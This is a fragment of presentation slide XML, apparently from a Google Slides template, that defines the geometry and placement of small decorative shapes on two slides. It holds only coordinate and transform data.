                  <a:cubicBezTo>
                    <a:pt x="1029" y="166"/>
                    <a:pt x="1003" y="141"/>
                    <a:pt x="953" y="116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="928" y="91"/>
                    <a:pt x="903" y="66"/>
                    <a:pt x="853" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="828" y="41"/>
                    <a:pt x="778" y="16"/>
                    <a:pt x="728" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="686" y="5"/>
                    <a:pt x="644" y="0"/>
                    <a:pt x="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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8700096" y="3562403"/>
              <a:ext cx="55383" cy="54007"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3059" h="2983" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2707" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2626" y="0"/>
                    <a:pt x="2544" y="25"/>
                    <a:pt x="2482" y="75"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="126" y="2456"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2582"/>
                    <a:pt x="0" y="2782"/>
                    <a:pt x="126" y="2907"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="2958"/>
                    <a:pt x="251" y="2983"/>
                    <a:pt x="351" y="2983"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="427" y="2983"/>
                    <a:pt x="502" y="2958"/>
                    <a:pt x="552" y="2907"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2933" y="527"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3058" y="401"/>
                    <a:pt x="3058" y="201"/>
                    <a:pt x="2933" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2870" y="25"/>
                    <a:pt x="2789" y="0"/>
                    <a:pt x="2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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8578586" y="13822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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8996935" y="112825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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8736972" y="791447"/>
              <a:ext cx="59475" cy="59457"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3285" h="3284" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1655" y="627"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2206" y="627"/>
                    <a:pt x="2657" y="1103"/>
                    <a:pt x="2657" y="1654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2657" y="2206"/>
                    <a:pt x="2206" y="2657"/>
                    <a:pt x="1655" y="2657"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1079" y="2657"/>
                    <a:pt x="627" y="2206"/>
                    <a:pt x="627" y="1654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="627" y="1103"/>
                    <a:pt x="1079" y="627"/>
                    <a:pt x="1655" y="627"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1655" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="753" y="0"/>
                    <a:pt x="1" y="752"/>
                    <a:pt x="1" y="1654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="2556"/>
                    <a:pt x="753" y="3283"/>
                    <a:pt x="1655" y="3283"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2557" y="3283"/>
                    <a:pt x="3284" y="2556"/>
                    <a:pt x="3284" y="1654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3284" y="752"/>
                    <a:pt x="2557" y="0"/>
                    <a:pt x="1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45"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="-29671" y="11222"/>
            <a:ext cx="1758614" cy="3882110"/>
            <a:chOff x="7444711" y="1171313"/>
            <a:chExt cx="1758614" cy="3882110"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1162" name="Google Shape;1162;p45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="8761336" y="4629316"/>
              <a:ext cx="72619" cy="101243"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4011" h="5592" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="3663" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3555" y="1"/>
                    <a:pt x="3449" y="56"/>
                    <a:pt x="3384" y="153"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="76" y="5090"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="5241"/>
                    <a:pt x="26" y="5441"/>
                    <a:pt x="176" y="5542"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="226" y="5567"/>
                    <a:pt x="276" y="5592"/>
                    <a:pt x="351" y="5592"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="452" y="5592"/>
                    <a:pt x="552" y="5542"/>
                    <a:pt x="602" y="5441"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3910" y="504"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4011" y="354"/>
                    <a:pt x="3960" y="153"/>
                    <a:pt x="3835" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3782" y="17"/>
                    <a:pt x="3722" y="1"/>
                    <a:pt x="3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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="8775794" y="3218534"/>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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="8671046" y="1505624"/>
              <a:ext cx="60362" cy="108177"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3334" h="5975" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2984" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2870" y="1"/>
                    <a:pt x="2759" y="57"/>
                    <a:pt x="2707" y="160"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="75" y="5524"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="5674"/>
                    <a:pt x="75" y="5850"/>
                    <a:pt x="226" y="5925"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="276" y="5950"/>
                    <a:pt x="326" y="5975"/>
                    <a:pt x="351" y="5975"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="476" y="5975"/>
                    <a:pt x="577" y="5900"/>
                    <a:pt x="652" y="5800"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3258" y="436"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3333" y="286"/>
                    <a:pt x="3283" y="110"/>
                    <a:pt x="3133" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3086" y="12"/>
                    <a:pt x="3035" y="1"/>
                    <a:pt x="29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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="8929676" y="4249509"/>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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="8647890" y="221937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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="8936236" y="1171313"/>
              <a:ext cx="59004" cy="59022"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3259" h="3260" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1629" y="627"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2180" y="627"/>
                    <a:pt x="2632" y="1079"/>
                    <a:pt x="2632" y="1630"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2632" y="2181"/>
                    <a:pt x="2180" y="2632"/>
                    <a:pt x="1629" y="2632"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1078" y="2632"/>
                    <a:pt x="627" y="2181"/>
                    <a:pt x="627" y="1630"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="627" y="1079"/>
                    <a:pt x="1078" y="627"/>
                    <a:pt x="1629" y="627"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1629" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="727" y="1"/>
                    <a:pt x="0" y="728"/>
                    <a:pt x="0" y="1630"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2532"/>
                    <a:pt x="727" y="3259"/>
                    <a:pt x="1629" y="3259"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2531" y="3259"/>
                    <a:pt x="3258" y="2532"/>
                    <a:pt x="3258" y="1630"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3258" y="728"/>
                    <a:pt x="2531"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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="8756339" y="2532485"/>
              <a:ext cx="22722" cy="22975"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1255" h="1269" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="625" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="461" y="0"/>
                    <a:pt x="295" y="72"/>
                    <a:pt x="176" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="216"/>
                    <a:pt x="126" y="241"/>
                    <a:pt x="101" y="291"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="317"/>
                    <a:pt x="51" y="342"/>
                    <a:pt x="51" y="392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="417"/>
                    <a:pt x="26" y="467"/>
                    <a:pt x="1" y="517"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="542"/>
                    <a:pt x="1" y="592"/>
                    <a:pt x="1" y="642"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="793"/>
                    <a:pt x="51" y="943"/>
                    <a:pt x="176" y="1068"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="302" y="1194"/>
                    <a:pt x="452" y="1269"/>
                    <a:pt x="627" y="1269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="778" y="1269"/>
                    <a:pt x="953" y="1194"/>
                    <a:pt x="1054" y="1068"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1179" y="943"/>
                    <a:pt x="1254" y="793"/>
                    <a:pt x="1254" y="642"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1254" y="592"/>
                    <a:pt x="1254" y="542"/>
                    <a:pt x="1229" y="517"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1229" y="467"/>
                    <a:pt x="1204" y="417"/>
                    <a:pt x="1204" y="392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1179" y="342"/>
                    <a:pt x="1154" y="317"/>
                    <a:pt x="1154" y="291"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1129" y="241"/>
                    <a:pt x="1104" y="216"/>
                    <a:pt x="1054" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1028" y="166"/>
                    <a:pt x="1003" y="141"/>
                    <a:pt x="978" y="116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="928" y="91"/>
                    <a:pt x="903" y="66"/>
                    <a:pt x="853" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="828" y="41"/>
                    <a:pt x="778" y="16"/>
                    <a:pt x="753" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="711" y="5"/>
                    <a:pt x="668" y="0"/>
                    <a:pt x="6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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="9162470" y="4771784"/>
              <a:ext cx="22704" cy="22595"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1254" h="1248" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="614" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="451" y="0"/>
                    <a:pt x="288" y="57"/>
                    <a:pt x="176" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="194"/>
                    <a:pt x="125" y="219"/>
                    <a:pt x="100" y="270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="295"/>
                    <a:pt x="50" y="320"/>
                    <a:pt x="50" y="370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="395"/>
                    <a:pt x="0" y="445"/>
                    <a:pt x="0" y="495"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="520"/>
                    <a:pt x="0" y="570"/>
                    <a:pt x="0" y="620"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="771"/>
                    <a:pt x="50" y="946"/>
                    <a:pt x="176" y="1047"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="301" y="1172"/>
                    <a:pt x="451" y="1247"/>
                    <a:pt x="627" y="1247"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="777" y="1247"/>
                    <a:pt x="952" y="1172"/>
                    <a:pt x="1053" y="1047"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1178" y="946"/>
                    <a:pt x="1253" y="771"/>
                    <a:pt x="1253" y="620"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1253" y="570"/>
                    <a:pt x="1228" y="520"/>
                    <a:pt x="1228" y="495"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1228" y="445"/>
                    <a:pt x="1203" y="395"/>
                    <a:pt x="1203" y="370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1178" y="320"/>
                    <a:pt x="1153" y="295"/>
                    <a:pt x="1128" y="270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1103" y="219"/>
                    <a:pt x="1078" y="194"/>
                    <a:pt x="1053" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="940" y="57"/>
                    <a:pt x="777"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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="8559411" y="3742207"/>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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="9129864" y="3765209"/>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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="9144303" y="271687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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="9067369" y="1795634"/>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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="8152594" y="4794384"/>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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="8582114" y="4994409"/>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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="7572936" y="4994400"/>
              <a:ext cx="59004" cy="59022"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3259" h="3260" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1629" y="627"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2180" y="627"/>
                    <a:pt x="2632" y="1079"/>
                    <a:pt x="2632" y="1630"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2632" y="2181"/>
                    <a:pt x="2180" y="2632"/>
                    <a:pt x="1629" y="2632"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1078" y="2632"/>
                    <a:pt x="627" y="2181"/>
                    <a:pt x="627" y="1630"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="627" y="1079"/>
                    <a:pt x="1078" y="627"/>
                    <a:pt x="1629" y="627"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1629" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="727" y="1"/>
                    <a:pt x="0" y="728"/>
                    <a:pt x="0" y="1630"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2532"/>
                    <a:pt x="727" y="3259"/>
                    <a:pt x="1629" y="3259"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2531" y="3259"/>
                    <a:pt x="3258" y="2532"/>
                    <a:pt x="3258" y="1630"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3258" y="728"/>
                    <a:pt x="2531"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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="7444711" y="4743982"/>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31">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1178"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1179" name="Google Shape;1179;p46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543575" y="4771600"/>
            <a:ext cx="834900" cy="9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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543575" y="4945107"/>
            <a:ext cx="1199100" cy="9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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8530275" y="4771600"/>
            <a:ext cx="212400" cy="9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2" name="Google Shape;1182;p46"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-7" y="1128258"/>
            <a:ext cx="584466" cy="3281784"/>
            <a:chOff x="8559523" y="1128258"/>
            <a:chExt cx="584466" cy="3281784"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1183" name="Google Shape;1183;p46"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8559523" y="273560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6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8623363" y="4301955"/>
              <a:ext cx="60380" cy="108087"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3335" h="5970" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2985" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2871" y="0"/>
                    <a:pt x="2763" y="70"/>
                    <a:pt x="2708" y="180"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="76" y="5519"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="5669"/>
                    <a:pt x="51" y="5870"/>
                    <a:pt x="201" y="5945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="252" y="5970"/>
                    <a:pt x="302" y="5970"/>
                    <a:pt x="352" y="5970"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="477" y="5970"/>
                    <a:pt x="577" y="5920"/>
                    <a:pt x="627" y="5794"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3259" y="456"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3334" y="306"/>
                    <a:pt x="3259" y="105"/>
                    <a:pt x="3109" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3068" y="10"/>
                    <a:pt x="3026" y="0"/>
                    <a:pt x="2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6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9016004" y="2994926"/>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6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8736973" y="19643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6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9121267" y="3702904"/>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6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9034598" y="1818952"/>
              <a:ext cx="22722" cy="22993"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1255" h="1270" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="603" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="446" y="0"/>
                    <a:pt x="295" y="72"/>
                    <a:pt x="176" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="216"/>
                    <a:pt x="126" y="241"/>
                    <a:pt x="101" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="317"/>
                    <a:pt x="51" y="342"/>
                    <a:pt x="51" y="392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="417"/>
                    <a:pt x="1" y="467"/>
                    <a:pt x="1" y="517"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="542"/>
                    <a:pt x="1" y="592"/>
                    <a:pt x="1" y="642"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="793"/>
                    <a:pt x="51" y="968"/>
                    <a:pt x="176" y="1069"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="302" y="1194"/>
                    <a:pt x="452" y="1269"/>
                    <a:pt x="628" y="1269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="653" y="1269"/>
                    <a:pt x="703" y="1244"/>
                    <a:pt x="728" y="1244"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="778" y="1244"/>
                    <a:pt x="828" y="1219"/>
                    <a:pt x="853" y="1219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="903" y="1194"/>
                    <a:pt x="928" y="1169"/>
                    <a:pt x="953" y="1144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1003" y="1119"/>
                    <a:pt x="1029" y="1094"/>
                    <a:pt x="1054" y="1069"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1179" y="968"/>
                    <a:pt x="1254" y="793"/>
                    <a:pt x="1254" y="642"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1254" y="592"/>
                    <a:pt x="1229" y="542"/>
                    <a:pt x="1229" y="517"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1229" y="467"/>
                    <a:pt x="1204" y="417"/>
                    <a:pt x="1204" y="392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1179" y="342"/>
                    <a:pt x="1154" y="317"/>
                    <a:pt x="1129" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1104" y="241"/>
                    <a:pt x="1079" y="216"/>
                    <a:pt x="1054" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1029" y="166"/>
                    <a:pt x="1003" y="141"/>
                    <a:pt x="953" y="116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="928" y="91"/>
                    <a:pt x="903" y="66"/>
                    <a:pt x="853" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="828" y="41"/>
                    <a:pt x="778" y="16"/>
                    <a:pt x="728" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="686" y="5"/>
                    <a:pt x="644" y="0"/>
                    <a:pt x="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6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8700096" y="3562403"/>
              <a:ext cx="55383" cy="54007"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3059" h="2983" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2707" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2626" y="0"/>
                    <a:pt x="2544" y="25"/>
                    <a:pt x="2482" y="75"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="126" y="2456"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2582"/>
                    <a:pt x="0" y="2782"/>
                    <a:pt x="126" y="2907"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="2958"/>
                    <a:pt x="251" y="2983"/>
                    <a:pt x="351" y="2983"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="427" y="2983"/>
                    <a:pt x="502" y="2958"/>
                    <a:pt x="552" y="2907"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2933" y="527"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3058" y="401"/>
                    <a:pt x="3058" y="201"/>
                    <a:pt x="2933" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2870" y="25"/>
                    <a:pt x="2789" y="0"/>
                    <a:pt x="2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6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8578586" y="13822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6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
